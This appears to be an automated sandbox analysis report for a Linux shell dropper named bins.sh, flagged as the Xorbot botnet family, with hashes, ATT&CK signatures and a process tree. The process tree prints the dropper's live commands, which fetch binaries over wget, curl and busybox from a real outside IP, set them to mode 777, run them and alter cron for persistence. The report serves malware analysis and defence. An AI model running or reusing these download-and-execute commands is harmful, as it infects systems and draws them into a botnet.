Analysis
-
max time kernel
75s -
max time network
152s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
03-12-2024 22:26
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
2fb07c471bdf3d544ed7b17a96c49562
-
SHA1
d0fcc460e8765eb060a8fd97f608691716a20163
-
SHA256
8fd6fbf664ac74a348aa5d1f7456a71e7806bcced78f8d18d1c6c0c4f2344b4f
-
SHA512
526f3eed7ddf8c6697664873fe9fb49c382134a1241790ccaa04edbabbd693deb1a3a8dd341f332d2a878d9a060d70087832449d299647aec5291c7b14645c35
-
SSDEEP
96:Ettf8gEtkD6cp6cx6cL+6G+vfeZK6KXLog5ZMP3ZK6KXLeg5bttf8gySSjKMc6ci:5tkD6S666P+v25G6S666N+S
Malware Config
Signatures
-
Processes:
resource yara_rule behavioral2/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (2075) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodpid Process 809 chmod 706 chmod -
Executes dropped EXE 2 IoCs
Processes:
f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQILioc pid Process /tmp/f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 707 f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 /tmp/b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQIL 810 b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQIL -
Renames itself 1 IoCs
Processes:
f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6pid Process 708 f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.UUssnX crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc Process File opened for reading /proc/cpuinfo curl -
Processes:
f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6description ioc Process File opened for reading /proc/728/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/768/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/847/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/860/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/891/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/909/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/924/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/820/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/841/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/917/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/934/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/858/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/11/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/318/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/741/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/762/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/769/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/815/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/832/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/883/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/956/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/8/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/23/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/43/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/674/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/744/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/772/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/837/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/77/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/109/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/723/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/807/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/907/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/929/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/13/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/145/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/806/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/863/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/954/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/961/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/28/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/29/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/794/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/106/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/150/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/719/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/771/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/801/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/733/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/740/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/745/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/756/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/797/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/881/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/918/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/868/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/877/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/919/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/938/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/942/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/735/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/833/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/834/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 File opened for reading /proc/939/cmdline f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQILrmwgetcurlbusyboxpid Process 810 b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQIL 812 rm 718 wget 719 curl 808 busybox -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxbusyboxdescription ioc Process File opened for modification /tmp/f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 wget File opened for modification /tmp/f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 curl File opened for modification /tmp/f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6 busybox File opened for modification /tmp/b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQIL busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:674
-
/bin/rm/bin/rm bins.sh2⤵PID:676
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc62⤵
- Writes file to tmp directory
PID:680
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc62⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:694
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc62⤵
- Writes file to tmp directory
PID:704
-
-
/bin/chmodchmod 777 f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc62⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc6./f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc62⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:707 -
/bin/shsh -c "crontab -l"3⤵PID:709
-
/usr/bin/crontabcrontab -l4⤵PID:710
-
-
-
/bin/shsh -c "crontab -"3⤵PID:712
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:713
-
-
-
-
/bin/rmrm f5ZuHoZ01FhzF1Rr2UNAAGxPCxzEJNkJc62⤵PID:716
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQIL2⤵
- System Network Configuration Discovery
PID:718
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQIL2⤵
- System Network Configuration Discovery
PID:719
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQIL2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:808
-
-
/bin/chmodchmod 777 b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQIL2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQIL./b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQIL2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:810
-
-
/bin/rmrm b0NRJjOXsGdUJBU9KXX62MdZGiPvRmSQIL2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hBieqEVONfG5TIUR0xB7rv2cQv97ST4LP2⤵PID:813
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD53c90d5820bddcf7c5d1bd21dfa49d958
SHA15ba05bd489e50af97d6dc45e3a0be60e494d5083
SHA256bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2
SHA51254a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
210B
MD5c8c01bacd5b8e3cffe92911176acfffb
SHA1870eb215d8d5e53706b51ff75d3050e3cc5e40f1
SHA256da06f120f564301d91a51627f62fcf9aa224f533a6bbb1bd4870a9dc72fb0dcd
SHA512aeb2b2f33bc84907ae9371a2a534bac902f0df17690213f0bb8ddbad1d66de9700529fcc102aa49ab3dc198dfa6ff9a65ede202f1e351581050ff17e2b1f393d